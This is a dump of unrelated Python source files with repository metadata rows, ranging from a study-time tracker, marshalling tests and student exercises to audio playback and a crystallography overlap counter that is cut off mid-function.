plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) ###假正率为横坐标,真正率为纵坐标做曲线
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
print(roc_auc)
# In[ ]:
| true |
94a27b5b5a5f4f772a6b0a1eb168b1f8e7358d5a
|
Python
|
mmubarak0/TimeTracker
|
/time.py
|
UTF-8
| 8,994 | 2.8125 | 3 |
[] |
no_license
|
#!/usr/bin/python3
import time
import os
import shelve
import datetime
# TODO > start counting the time when I start this program (start_time) $START
# TODO > pause counting the time when I press P (pause_time)
# TODO > continue counting the time when I press n (continue_time)
# TODO > stop counting the time when I press q (stop_time) $STOP
# TODO > save the time spent after pressing q in status.txt
# file in days > hours > minute>second format (save_time) $TIME
# TODO > calculate the total time spent in the same format
# by all time (save_time_total) $ALL_TIME
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# allTimeStart == tstart
allTimeStart = []
# allTimeStop == tstop
allTimeStop = []
etimstat = time.strftime("%I:%M:%S")
tume = datetime.datetime.now()
print("""%s
[1]برمجة
[2]العاب
[3]ميكانيكية
[4]كهربية
[5]علم المواد
[6]ديناميكية
[7]تحليلية
[8]تفاضلية
[9]كيمياء
[10]اشياء اخرى
%s""" %(bcolors.OKBLUE, bcolors.ENDC))
ent = input("Enter : ")
if ent == "":
ent = 0
else:
ent = int(ent)
lisent = [0, "programming", "gaming", "mechanic", "electric", "material",
"dynamics", "analysis", "deffrential_eq", "chemics", "other_staff"]
try:
shelfFile = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db" % lisent[ent])
shelfFileDay = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db%s" % (lisent[ent], tume.day))
except Exception:
os.mkdir("/home/ki2kid/dev/python/timer/%s/" % lisent[ent])
os.mkdir("/home/ki2kid/dev/python/timer/%s/db" % lisent[ent])
shelfFile = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db" % lisent[ent])
shelfFileDay = shelve.open(
"/home/ki2kid/dev/python/timer/%s/db/db%s" % (lisent[ent], tume.day))
def start_time():
startTime = time.time()
allTimeStart.append(startTime)
return allTimeStart
def stop_time():
stopTime = time.time()
allTimeStop.append(stopTime)
return allTimeStop
# list pause time
listPauseTime = []
def addPauseTime():
n = 0
for i in listPauseTime:
n = n + i
return n
start_time()
# Old --------------------------------
def oldcode():
# x = input("enter ")
# if x == "p":
# pauseTimeStart = time.time()
# x = input("enter ")
# if x == "n":
# pauseTimeEnd = time.time()
# pauseTime = (pauseTimeEnd) - (pauseTimeStart)
# pause = []
# for i in str(pauseTime):
# if i == ".":
# break
# else:
# pause.append(i)
# print("".join(pause))
# x = input("enter ")
# if x == "q":
# stop_time()
# save_time = allTimeStop[0] - allTimeStart[0] - pauseTime
# alltime = []
# for i in str(save_time):
# if i == ".":
# break
# else:
# alltime.append(i)
# # print("".join(alltime))
# START = allTimeStart[0]
# STOP = allTimeStop[0]
# TIME = "".join(alltime)
# ALL_TIME = save_time
# # print START
# starSTART = []
# for i in str(START):
# if i == ".":
# break
# else:
# starSTART.append(i)
# print("".join(starSTART))
# # print STOP
# starSTOP = []
# for i in str(STOP):
# if i == ".":
# break
# else:
# starSTOP.append(i)
# print("".join(starSTOP))
# # # print TIME
# # starTIME = []
# # for i in str(TIME):
# # if i == ".":
# # break
# # else:
# # starTIME.append(i)
# # print("".join(starTIME))
# print(TIME)
# # print ALL_TIME
# starALL_TIME = []
# for i in str(ALL_TIME):
# if i == ".":
# break
# else:
# starALL_TIME.append(i)
# print("".join(starALL_TIME))
# addPauseTime()
pass
# Old code --------------------------------
# Redefined code --------------------------------
print("""
the counter has been started since you see this message ...
[1] type (p) to pause the time counter, (n) to continue .
[2] type (q) to save status and quite .
[3] type (show) to show status .
[4] type (l) to make loop .
[5] type (h) to show this help message .
""")
n = True
while n:
x = input("Press ")
# help message
if x == "h":
print("""
the counter has been started since you see this message ...
[1] type (p) to pause the time counter, (n) to continue .
[2] type (q) to save status and quite .
[4] type (l) to make loop .
[5] type (h) to show this help message .
""")
# reset the counter
if x == "l":
start_time()
# pause the time counter
if x == "p":
pauseTimeStart = time.time()
print("the counter has been paused press (n) to continue ....")
# continue the time counter , save the pause time
if x == "n":
print("counter is now working ...")
pauseTimeEnd = time.time()
try:
pauseTime = (pauseTimeEnd) - (pauseTimeStart)
except Exception:
pass
# adding pause times
try:
listPauseTime.append(pauseTime)
except Exception:
pass
# save status and quite
if x == "q":
stop_time()
save_time = allTimeStop[0] - allTimeStart[0] - addPauseTime()
seconds = round(save_time)
minutes = round(round(save_time)/60)
hours = round(round(save_time)/(60*60), 2)
days = round(round(save_time)/(60*60*24), 2)
if round(round(save_time)/(60*60), 2) >= 15:
print(f"\n{bcolors.HEADER}time {seconds} seconds >> \
{minutes} minute >> \
{hours} hours >> \
{days} days {bcolors.ENDC}⚠️")
elif round(round(save_time)/(60)) < 15:
print(f"\n{bcolors.HEADER}time {round(save_time)} seconds >> \
{round(round(save_time)/60, 2)} minute{bcolors.ENDC}⚠️")
else:
print(f"\n{bcolors.HEADER}time {seconds} seconds >> \
{minutes} minute >> \
{hours} hours >> \
{days} days{bcolors.ENDC}⚠️")
n = False
print(f"\n{bcolors.OKCYAN}started at", etimstat)
print("Ended at ", time.strftime("%I:%M:%S"), f"{bcolors.ENDC}")
try:
shelfFile["cats"] += allTimeStart
shelfFile["dogs"] += allTimeStop
except Exception:
shelfFile["cats"] = allTimeStart
shelfFile["dogs"] = allTimeStop
try:
# for day
shelfFileDay["cats"] += allTimeStart
shelfFileDay["dogs"] += allTimeStop
except Exception:
# for day
shelfFileDay["cats"] = allTimeStart
shelfFileDay["dogs"] = allTimeStop
ss = shelfFile["cats"]
sp = shelfFile["dogs"]
ssday = shelfFileDay["cats"]
spday = shelfFileDay["dogs"]
TimeTakenAtThisSession = round(sp[-1] - ss[-1])
HistoryOfProgram = round((sp[-1] - ss[0]))
def total_time_today_for_this_program():
day = []
for i in range(len(ssday)):
try:
day.append(spday[-i] - ssday[-i])
except Exception:
break
zday = 0
for i in day:
zday += i
return zday
def total_time_from_creating_this_program():
x = []
for i in range(len(ss)):
try:
x.append(sp[-i] - ss[-i])
except Exception:
break
zx = 0
for i in x:
zx += i
print(f"{bcolors.OKBLUE}total time this program was running since first launch is :{bcolors.ENDC}")
return zx
TOTAL = total_time_from_creating_this_program()
shelfFile.close()
TOTALDAY = total_time_today_for_this_program()
shelfFileDay.close()
final = ('"'+str(round(TOTAL))+' seconds >> \
'+str(round(TOTAL/60, 2))+' minute >> \
'+str(round(TOTAL/60/60, 2))+' hours >> \
'+str(round(TOTAL/60/60/24, 2))+' days 💙️"')
finalday = ('"'+str(round(TOTALDAY))+' seconds >> \
'+str(round(TOTALDAY/60, 2))+' minute >> \
'+str(round(TOTALDAY/60/60, 2))+' hours >> \
'+str(round(TOTALDAY/60/60/24, 2))+' days 💙️"')
print(final)
# os.system("echo %s >> ./status.txt" % str(final))
tumme = f"{tume.day}_{tume.month}_{tume.year}"
try:
os.mkdir("/home/ki2kid/dev/python/timer/%s/statusdb" % lisent[ent])
except Exception:
pass
try:
os.mkdir("/home/ki2kid/dev/python/timer/%s/statusdb/bydays" % lisent[ent])
except Exception:
pass
# SAVE
os.system("echo %s > /home/ki2kid/dev/python/timer/%s/statusdb/status%s.txt" %
(str(final), lisent[ent], tumme))
os.system("echo %s > /home/ki2kid/dev/python/timer/%s/statusdb/bydays/status%s.txt" %
(str(finalday), lisent[ent], tumme))
print(f"""{bcolors.OKBLUE}
[s]show today status
{bcolors.ENDC}""")
endore = input("or press any key to exit ... ")
if endore == "s":
os.system("less /home/ki2kid/dev/python/timer/%s/statusdb/bydays/status%s.txt" %
(lisent[ent], tumme))
# while True:
# print(finalday, end="\r")
# time.sleep(1)
# print(final, end="\r")
# time.sleep(1)
| true |
1c3024ab9db9d26e95daa20e6cb981c064b09f18
|
Python
|
hexane360/pyRPC
|
/pyrpc/test_marshal.py
|
UTF-8
| 2,460 | 2.75 | 3 |
[] |
no_license
|
import math
import re
import pytest
import numpy as np
from .marshal import marshal_to_str, unmarshal_from_str
from .marshal import marshal_obj
from .marshal import marshal, unmarshal
from .marshal import MARSHAL_VERSION_STR
TEST_ROUNDTRIP = {
"int": 5,
"float": 1./32.,
"infinity": math.inf,
"complex": complex(1., -1.),
"str": "Test ⊗ String\0",
"bytes": b"\0\5\10text\rs",
"none": None,
"collections": [1, 2, {'a': 5, 'b': [1, math.inf, 3]}],
"set": set([1, 5, 8]),
}
@pytest.mark.parametrize("name,obj", TEST_ROUNDTRIP.items())
def test_roundtrip(name, obj):
assert obj == unmarshal_from_str(marshal_to_str(obj))
def test_ndarray():
arr = np.array(range(18), dtype=np.uint8)
arr = arr.reshape((3, 3, 2))
roundtrip = unmarshal_from_str(marshal_to_str(arr))
assert np.array_equal(arr, roundtrip)
assert arr.dtype == roundtrip.dtype
assert arr.shape == roundtrip.shape
assert marshal_obj(arr) == {
'type': 'ndarray',
'shape': (3, 3, 2),
'size': 18,
'data': "k05VTVBZAwB0AAAAeydkZXNjcic6ICd8dTEnLCAnZm9ydHJhb"
"l9vcmRlcic6IEZhbHNlLCAnc2hhcGUnOiAoMywgMywgMiksIH"
"0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA"
"gICAgICAgICAgICAgICAgIAoAAQIDBAUGBwgJCgsMDQ4PEBE="
}
TEST_MARSHAL = {
"dict": (
{'a': 5, 'b': 10},
{'type': 'dict', 'data': {'a': 5, 'b': 10}}
),
"nested_dict": (
{'a': {'a': 5, 'b': 10}, 'd': 10},
{'type': 'dict',
'data': {'a': {'type': 'dict',
'data': {'a': 5, 'b': 10}},
'd': 10}}
),
}
@pytest.mark.parametrize("name,obj,expected", ((k, *v) for (k, v) in TEST_MARSHAL.items()))
def test_marshal(name, obj, expected):
assert marshal_obj(obj) == expected
def test_version_marshal():
assert marshal(5) == {
'v': MARSHAL_VERSION_STR,
'data': 5,
}
def test_marshal_ref():
class TestType():
pass
def make_ref(obj):
return '/ref_url'
assert marshal_obj(TestType(), make_ref) == {
'type': 'ref', 'url': '/ref_url', 'class': 'TestType'
}
def test_version_unmarshal():
with pytest.raises(TypeError, match=re.escape("Expected a dict, got '<class 'int'>' instead.")):
unmarshal(5)
with pytest.raises(ValueError, match=re.escape("Could not decode protocol version info.")):
unmarshal({
'data': 5
})
with pytest.raises(ValueError, match=re.escape("Unsupported protocol version '0.0'")):
unmarshal({
'v': '0.0',
'data': 5
})
assert unmarshal({'v': MARSHAL_VERSION_STR, 'data': 5}) == 5
| true |
624af699a94883688daf8c52c1b4115bfc42c5a0
|
Python
|
HenriqueSilva29/infosatc-lp-avaliativo-06
|
/atividade 2.py
|
UTF-8
| 292 | 3.5625 | 4 |
[] |
no_license
|
caracter = ""
def parametroCaracter ():
caracter = input ( "Insira os caracteres {[()]}:" )
if "{[()]}" in caracter:
print ( "Parâmetro certo" )
return true
else:
print ( "ops, algo está errado!" )
return false
parametroCaracter ()
| true |
0237bbc540daab859fb1efec7740c0f827901989
|
Python
|
Paruyr31/Basic-It-Center
|
/Basic/Homework.2/21_.py
|
UTF-8
| 200 | 3.453125 | 3 |
[] |
no_license
|
a = int(input("a = ")) # nermucum enq a
b = int(input("b = ")) # nermucum enq b
c = int(input("c = ")) # nermucum enq c
max = a
if b>max:
max = b
if c>max:
max = c
print("Max = "+str(max))
| true |
4adfc4672d7817e46706f81b0a75518436a71c22
|
Python
|
paulhkoester16/automatic_diff
|
/automatic_diff/activations.py
|
UTF-8
| 452 | 3 | 3 |
[] |
no_license
|
'''
Standard library of activation functions, implemented for dual numbers.
https://en.wikipedia.org/wiki/Activation_function
'''
from automatic_diff.dual_number import DualNumber
def identity(d: DualNumber):
'''Identity activation'''
return d
def softsign(d: DualNumber):
'''Softsign activation'''
return d/(1 + abs(d))
def isru(d: DualNumber, alpha=1.0):
'''Inverse square root unit'''
return d/(1 + alpha * d**2)**0.5
| true |
a64151e7e9ce7fdb013470ce6b6f0df8619bc058
|
Python
|
arlenk/pi-monitor
|
/pi_monitor/configuration/parser.py
|
UTF-8
| 1,641 | 3.109375 | 3 |
[
"MIT"
] |
permissive
|
import os
from pathlib import Path
import toml
def parse_config(config_file: str, dotenv_file: str, include_os_env: bool) -> dict:
"""
Parse configuration file(s)
"""
config_file = Path(config_file)
if not config_file.exists():
raise IOError("could not find config file: {}".format(config_file))
if dotenv_file:
dotenv_file = Path(dotenv_file)
if not dotenv_file.exists():
raise IOError("could not find .env file: {}".format(dotenv_file))
env = dict()
if include_os_env:
env = os.environ.copy()
if dotenv_file:
dotenv = _parse_dotenv(dotenv_file)
env.update(dotenv)
config = _parse_config(config_file, env)
return config
def _parse_dotenv(path: Path) -> dict:
"""
Parse .env file into a simple dict
"""
env = dict()
with path.open() as file:
for iline, line in enumerate(file):
line = line.strip()
if '=' not in line:
raise ValueError("line {} [line #{}] in {} is missing "
"a key value pair".format(line, iline, path))
key, value = line.split('=', 1)
env[key] = value
return env
def _parse_config(path: Path, env: dict) -> dict:
"""
Parse config file, with optional environment variables
Any values matching $VALUE pattern will be substituted by env[VALUE]
"""
path = Path(path)
if not path.exists():
raise IOError("could not find config file: {}".format(path))
s = path.open().read()
s = s.format(**env)
config = toml.loads(s)
return config
| true |
185b664c190a9719de4fb1787cba8b2277c8eba7
|
Python
|
ymm000596/dac
|
/play.py
|
UTF-8
| 1,655 | 2.59375 | 3 |
[] |
no_license
|
#===================================================================
# FileName: play_audio.py
# Author: Yin Mingming
# Email: ymingming@gmail.com
# WebSite: http://www.????.com
# CreateTime: 2010.01.01
#===================================================================
import time
import numpy as np
import pyaudio
import guiqwt.pyplot as plt
def test_sig(fs,fc):
pa = pyaudio.PyAudio()
frames = 16384
t = np.arange(frames)/float(fs)
s = np.cos(2.0*np.pi*fc*t).astype(np.float32)
stream = pa.open(format=pyaudio.paFloat32,channels = 1,rate =int(fs),output = True,frames_per_buffer=frames)
#mv = np.max(np.abs(s))
#s = s/mv
#print len(s),s.mean(),s.max(),s.min()
data = s.tostring()
idx=1
while True:
print idx
stream.write(data)
idx += 1
stream.close()
pa.terminate()
def main(fs,filename,cnt,dt):
pa = pyaudio.PyAudio()
s = np.loadtxt(filename).astype(np.float32)
print len(s),s.mean(),s.max(),s.min()
frames = len(s)
stream = pa.open(format=pyaudio.paFloat32,channels = 1,rate =int(fs),output = True,frames_per_buffer=frames)
mv = np.max(np.abs(s))
s = s/mv
data = np.zeros(frames,dtype=np.float32)
data[:len(s)] = s[:]
data /= np.max(np.abs(data))
data = data.tostring()
for k in xrange(cnt):
print k+1,'of',cnt
stream.write(data)
time.sleep(dt)
stream.close()
pa.terminate()
if __name__ == '__main__':
fs = 44100
main(fs,"../dsp/m_code_1_2_3_4_5_6.txt",10000,0.1)
#main(fs,"../dsp/m_code_1.txt",10000,0.1)
#test_sig(fs,18000)
| true |
10f51dd4a5fb286a8792b6009658ac20c1365352
|
Python
|
Assaf-Mor/Blind-75-Must-Do-Leetcode
|
/CombinationSum.py
|
UTF-8
| 755 | 3.28125 | 3 |
[] |
no_license
|
class Solution(object):
def combinationSum(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
result = [] # init the result set
def dfs(i, current, total):
if total == target:
result.append(current.copy())
return
if i >= len(candidates) or total > target:
return
current.append(candidates[i])
dfs(i, current, total + candidates[i])
current.pop()
dfs(i + 1, current, total)
dfs(0, [], 0)
return result
if __name__ == "__main__":
sol = Solution()
print(sol.combinationSum([2,3,6,7],7))
| true |
ad9d670ce7319be6c1dac8702c94cce6a8805718
|
Python
|
IraPS/homework
|
/1.py
|
UTF-8
| 844 | 2.875 | 3 |
[] |
no_license
|
import nltk
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
wnl = WordNetLemmatizer()
file = open('input.txt', 'r', encoding='utf-8')
text = file.read().split()
t = 'he was learning how to drive'.split()
print(type(t))
t = nltk.pos_tag(t)
mappedtags = {'NN': 'n', 'NNS': 'n', 'NNPS': 'n', 'NNP': 'n',
'JJ': 'a', 'JJS': 's', 'JJR': 's',
'RB': 'r', 'RBS': 's',
'VB': 'v', 'VBD': 'v', 'VDN': 'v', 'VBP': 'v', 'VBZ': 'v', 'VBG': 'v'}
for el in t:
print(el)
if el[1] in mappedtags:
pos = mappedtags[el[1]]
print(wnl.lemmatize(el[0], pos))
else:
print(wnl.lemmatize(el[0]))
#print(wnl.lemmatize('touching', pos='n'))
#nltk.help.upenn_tagset()
'''
import pymorphy2
morph = pymorphy2.MorphAnalyzer()
print(morph.parse('dogs'))
'''
| true |
7705cfc440d27f113c61f9059a3caf84c8f97c09
|
Python
|
thebusfactor/p11
|
/src/model/bus.py
|
UTF-8
| 1,402 | 3.125 | 3 |
[
"MIT"
] |
permissive
|
# MIT License
# Copyright (c) 2018 ENGR301-302-2018 / Project-11
class Bus:
"""
Parameters
----------
tl_x: int
Top left x coordinate.
tl_y: int
Top left y coordinate.
br_x: int
Bottom right x coordinate.
br_y: int
Bottom right y coordinate.
"""
tl_x: int
tl_y: int
br_x: int
br_y: int
flagged: bool
dir = "up"
has_intersected: bool
confidence: float
def __init__(self, tl_x, tl_y, br_x, br_y, confidence, flagged):
self.tl_x = tl_x
self.tl_y = tl_y
self.br_x = br_x
self.br_y = br_y
self.flagged = flagged
self.has_intersected = False
self.confidence = confidence
def set_t1(self, new_tl_x, new_tl_y, new_br_x, new_br_y, confidence):
self.tl_x = new_tl_x
self.tl_y = new_tl_y
self.br_x = new_br_x
self.br_y = new_br_y
self.confidence = confidence
def set_flagged(self, change):
self.flagged = change
def set_dir(self, new_dir):
self.dir = new_dir
def get_tl_x(self):
return self.tl_x
def set_has_intersected(self, has_intersected):
self.has_intersected = has_intersected
def get_has_intersected(self):
return self.has_intersected
def get_confidence(self):
return self.confidence
| true |
107ecccac093a3904fede11ca0abcbcc23ab2083
|
Python
|
betty29/code-1
|
/recipes/Python/146066_Exiting_loop_single_key/recipe-146066.py
|
UTF-8
| 570 | 3.375 | 3 |
[
"Python-2.0",
"MIT"
] |
permissive
|
import msvcrt
while 1:
print 'Testing..'
# body of the loop ...
if msvcrt.kbhit():
if ord(msvcrt.getch()) == 27:
break
"""
Here the key used to exit the loop was <ESC>, chr(27).
You can use the following variation for special keys:
if ord(msvcrt.getch()) == 0:
if ord(msvcrt.getch()) == 59: # <F1> key
break
With the following, you can discover the codes for the special keys:
if ord(msvcrt.getch()) == 0:
print ord(msvcrt.getch())
break
Use getche() if you want the key pressed be echoed."""
| true |
88c0b1031a0e46c762b35450c7a1e8d1e2cb8252
|
Python
|
egrahl/iolite
|
/src/iolite/overlaps/overlapping_spots.py
|
UTF-8
| 30,939 | 2.8125 | 3 |
[
"BSD-2-Clause"
] |
permissive
|
import itertools
from timeit import default_timer as timer
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import pylab
from dials.array_family import flex
from dxtbx.model.experiment_list import ExperimentListFactory
from dials.util.options import flatten_experiments
class OverlapCounter:
""" A class that counts the overlaps of shoeboxes of spots on imagesets.
The overlaps can be counted either per pixel or per shoebox."""
def __init__(self, inputfile, num_bins, outputfile_l, outputfile_t, run_shoeboxes):
"""
The overlap counter is initialized with default settings
for the filename to open, the number of resolution bins
the name of the output file containing the overlaps per resolution,
the name of the outputfile containing the overlaps per dataset
and the boolean that dicides whether the overlaps should be counted per
shoebox.
:param str inputfile: name of expt file that contains the reflection
table (default= "13_integrated.expt")
:param int num_bins: number of resolution bins (default:50)
:param str outputfile_l: name of outputfile written containing overlaps
per resolution bin (default: overlap_lists)
:param str outputfile_t: name of outputfile written containing average
overlaps (default: overlap_total)
:param bool run_shoeboxes: The boolean which decides whether overlaps
per shoebox should be run. If set to False,
overlaps per pixel will be run. (default:True)
"""
self.inputfile = inputfile
self.num_bins = num_bins
self.outputfile_l = outputfile_l
self.outputfile_t = outputfile_t
self.run_shoeboxes = run_shoeboxes
def np_resolution(self, x_dim, y_dim, panel, beam):
"""
This function writes a 2D numpy array of the resolutions (1/d^2)
corresponding to the pixels on the image.
:param int x_dim: width of the image and resolution numpy array
:param int y_dim: length of the image and resolution numpy array
:param panel:
:param beam:
:returns: 2D numpy array containing the resolutions (1/d^2)
"""
resolution = np.zeros((y_dim, x_dim))
for y in range(y_dim):
for x in range(x_dim):
d = panel.get_resolution_at_pixel(beam.get_s0(), (x, y))
resolution[y, x] = 1 / d ** 2
return resolution
def prepare_bins_shoebox(self, vmax, vmin, num_bins):
"""
This function prepares resolution bins for counting overlaps
per shoebox.
:param float vmax: maximum resolution in 1/d^2
:param float vmin: minimum resolution in 1/d^2
:param int num_bins: number of resolution bins
:returns: list of average resolution of resolution bins
and resolution intervall of resolution bins
"""
d2_list = []
intervall = (vmax - vmin) / (num_bins)
for i in range(num_bins):
d2 = vmin + ((2 * i + 1) / 2) * intervall
d2_list.append(d2)
return d2_list, intervall
def assign_shoebox_to_resolution_bin(self, d2_shoebox, vmin, vmax, intervall):
"""
This function assigns a shoebox to a resolution bin by writing an index
array, which contains the indices of the resolution bin in the resolution
bin list the shoebox belongs to. Additionally, the weight of each resolution
bin is recorded.
:param list d2_shoebox: list of resolutions in 1/d^2 of each shoebox
:param float vmax: maximum resolution in 1/d^2
:param float vmin: minimum resolution in 1/d^2
:param float intervall: resolution intervall of the resolution bins
"""
index_list = []
weight = [0] * self.num_bins
num_bins = self.num_bins
for d2 in d2_shoebox:
if d2 == vmin:
index = 0
elif d2 >= vmax:
index = num_bins - 1
else:
index = int((d2 - vmin - intervall / 2) / intervall)
index_list.append(index)
weight[index] += 1
index_array = np.array(index_list)
return index_array, weight
def prepare_bins_pixel(self, vmax, vmin, num_bins, resolution):
"""This function sets bins with resolution ranges and a list of indices
of the bin in the resolution bin list to enable referring back from a
pixel to the right resolution bin. Additionally it tracks how many pixels
go into each bin.
:param float vmax: maximum 1/d^2 value of image
:param float vmin: minimum 1/d^2 value of image
:param int num_bins: number of resolution bins
:param numpy array resolution: 2D numpy array containing the 1/d^2 values
for each pixel
:returns: list of average value of resolution bins, 1D numpy array of
indices in the resolution bin list, list of weight of bins
"""
d2_list = []
weight = [0] * num_bins
resolution_1d = resolution.reshape(-1)
index_list = []
intervall = (vmax - vmin) / (num_bins)
for i in range(num_bins):
d2 = vmin + ((2 * i + 1) / 2) * intervall
d2_list.append(d2)
for d2 in resolution_1d:
if d2 == vmin:
index = 0
elif d2 == vmax:
index = num_bins - 1
else:
index = int((d2 - vmin - intervall / 2) / intervall)
index_list.append(index)
weight[index] += 1
index_array = np.array(index_list)
return d2_list, index_array, weight
def write_bg_and_fg_mask(self, reflections, shoebox, y_dim, x_dim, z):
"""This function writes masks (one for forground, one for background)
of the shape of the image that contain the counts of shoeboxes that
have a foreground/background at the specific pixels.
:param dials_array_family_flex_ext.reflection_table reflections: reflection table
:param list shoeboxes: list that contains all shoeboxes on the image
:param int y_dim: height of the image
:param int x_dim: width of the image
:param int z: index of image in dataset
:returns: masks of counts of background and foreground pixels in shoeboxes
"""
# Get the bounding box overlaps
bbox_overlaps = reflections.find_overlaps()
# create empty masks with the shape of the image
n_background = np.zeros(dtype=int, shape=(y_dim, x_dim))
n_foreground = np.zeros(dtype=int, shape=(y_dim, x_dim))
for edge in bbox_overlaps.edges():
# get indices of overlapping shoeboxes in the shoebox list
index1 = bbox_overlaps.source(edge)
index2 = bbox_overlaps.target(edge)
# avoid counting overlaps twice
if index1 > index2:
bbox1 = shoebox[index1].bbox
bbox2 = shoebox[index2].bbox
mask1 = shoebox[index1].mask.as_numpy_array()
mask2 = shoebox[index2].mask.as_numpy_array()
shoebox_mask = [mask1, mask2]
shoebox_bbox = [bbox1, bbox2]
indices = [index1, index2]
# calculate coordinates of overlap
x0 = max(bbox1[0], bbox2[0], 0)
x1 = min(bbox1[1], bbox2[1], x_dim)
y0 = max(bbox1[2], bbox2[2], 0)
y1 = min(bbox1[3], bbox2[3], y_dim)
assert x1 > x0
assert y1 > y0
# add background and foreground information of shoeboxes to overall masks
for mask, bbox, index in zip(shoebox_mask, shoebox_bbox, indices):
x0m, x1m, y0m, y1m, z0m, _ = bbox
sub_mask = mask[
(z - z0m), (y0 - y0m) : (y1 - y0m), (x0 - x0m) : (x1 - x0m)
]
n_background[y0:y1, x0:x1] += (sub_mask & 3) == 3
n_foreground[y0:y1, x0:x1] += (sub_mask & 5) == 5
# set submask values to zero to avoid counting shoeboxes double
sub_mask[sub_mask == 3] = 0
sub_mask[sub_mask == 5] = 0
shoebox[index].mask = flex.int(mask)
return n_background, n_foreground
def write_overlaps_per_shoebox(self, reflections, shoebox, y_dim, x_dim, z):
"""
This function counts shoebox overlaps (background/background,
foreground/foreground, foreground/background, background/foreground)
for each shoebox.
:param reflections: the reflection table
:param list shoebox: the list containing the shoeboxes on one image
:param int y_dim: the height of the image
:param int x_dim: the width of the image
:param int z: the index of the current image
:returns: lists of the fg/fg,fg/bg,bg/fg and bg/bg overlaps per shoebox
"""
# Get the bounding box overlaps
bbox_overlaps = reflections.find_overlaps()
# create empty masks with the shape of the image
n_background = np.zeros(dtype=int, shape=(y_dim, x_dim))
n_foreground = np.zeros(dtype=int, shape=(y_dim, x_dim))
no_shoeboxes = len(shoebox)
fg_fg = [0] * no_shoeboxes
fg_bg = [0] * no_shoeboxes
bg_fg = [0] * no_shoeboxes
bg_bg = [0] * no_shoeboxes
# loop through the overlaps
for edge in bbox_overlaps.edges():
# get indices of overlapping shoeboxes in the shoebox list
index1 = bbox_overlaps.source(edge)
index2 = bbox_overlaps.target(edge)
# avoid counting overlaps twice
if index1 > index2:
bbox1 = shoebox[index1].bbox
bbox2 = shoebox[index2].bbox
mask1 = shoebox[index1].mask.as_numpy_array()
mask2 = shoebox[index2].mask.as_numpy_array()
# calculate coordinates of overlap
x0 = max(bbox1[0], bbox2[0], 0)
x1 = min(bbox1[1], bbox2[1], x_dim)
y0 = max(bbox1[2], bbox2[2], 0)
y1 = min(bbox1[3], bbox2[3], y_dim)
assert x1 > x0
assert y1 > y0
x01, x11, y01, y11, z01, _ = bbox1
x02, x12, y02, y12, z02, _ = bbox2
# get submasks of both shoeboxes for the overlapping area
sub_mask1 = mask1[
(z - z01), (y0 - y01) : (y1 - y01), (x0 - x01) : (x1 - x01)
]
sub_mask2 = mask2[
(z - z02), (y0 - y02) : (y1 - y02), (x0 - x02) : (x1 - x02)
]
# create background and foreground masks for both shoeboxes
array1_fg = np.zeros(sub_mask1.shape, dtype=int)
array1_bg = np.zeros(sub_mask1.shape, dtype=int)
array2_fg = np.zeros(sub_mask2.shape, dtype=int)
array2_bg = np.zeros(sub_mask2.shape, dtype=int)
# detect foreground and background pixels on submasks
array1_fg += (sub_mask1 & 5) == 5
array2_fg += (sub_mask2 & 5) == 5
array1_bg += (sub_mask1 & 3) == 3
array2_bg += (sub_mask2 & 3) == 3
# count overlaps
fg_fg[index1] += np.any(np.logical_and(array1_fg, array2_fg))
fg_fg[index2] += np.any(np.logical_and(array1_fg, array2_fg))
bg_bg[index1] += np.any(np.logical_and(array1_bg, array2_bg))
bg_bg[index2] += np.any(np.logical_and(array1_bg, array2_bg))
fg_bg[index1] += np.any(np.logical_and(array1_fg, array2_bg))
fg_bg[index2] += np.any(np.logical_and(array1_bg, array2_fg))
bg_fg[index1] += np.any(np.logical_and(array1_bg, array2_fg))
bg_fg[index2] += np.any(np.logical_and(array1_fg, array2_bg))
return fg_fg, fg_bg, bg_fg, bg_bg
def write_output_lists_pixel(self, res, total, bg, fg, bg_fg):
"""This function writes a text file containing the lists of the
average resolution of the bins and the overlaps per pixel per bin.
:param list res: list with resolution per bin
:param list total: list of total overlaps per bin
:param list bg: list of background overlaps per bin
:param list fg: list of foreground overlaps per bin
:param list bg_fg: list of background foreground overlaps per bin
"""
name_outfile = self.outputfile_l + "_pixel.txt"
with open(name_outfile, "w") as outfile:
for r, t, f, b, bf in zip(res, total, fg, bg, bg_fg):
outfile.write("%f, %f, %f, %f, %f\n" % (r, t, f, b, bf))
def write_output_total_pixel(self, ratio_total, ratio_bg, ratio_fg, ratio_bg_fg):
"""This function writes a text file containing the average
overlaps per pixel of the dataset.
:param float ratio_total: average total overlap ratio
:param float ratio_bg: average background overlap ratio
:param float ratio_fg: average foreground overlap ratio
:param float ratio_bg_fg: average background foreground overlap ratio
"""
text = [
"total overlap ratio:",
"foreground overlap ratio:",
"background overlap ratio:",
"background foreground overlap ratio:",
]
data = [ratio_total, ratio_fg, ratio_bg, ratio_bg_fg]
name_outfile = self.outputfile_t + "_pixel.txt"
with open(name_outfile, "w") as outfile:
for t, d in zip(text, data):
outfile.write("%s, %f\n" % (t, d))
def write_output_lists_shoebox(self, res, total_f, total_b, bg, fg, bg_fg, fg_bg):
"""This function writes a text file containing the lists of the
average resolution of the bins and the overlaps per shoebox per bin.
:param list res: list with resolution per bin
:param list total: list of total overlaps per bin
:param list bg: list of background overlaps per bin
:param list fg: list of foreground overlaps per bin
:param list bg_fg: list of background foreground overlaps per bin
"""
name_outfile = self.outputfile_l + "_shoebox.txt"
with open(name_outfile, "w") as outfile:
for r, tf, tb, f, b, fb, bf in zip(
res, total_f, total_b, fg, bg, fg_bg, bg_fg
):
outfile.write(
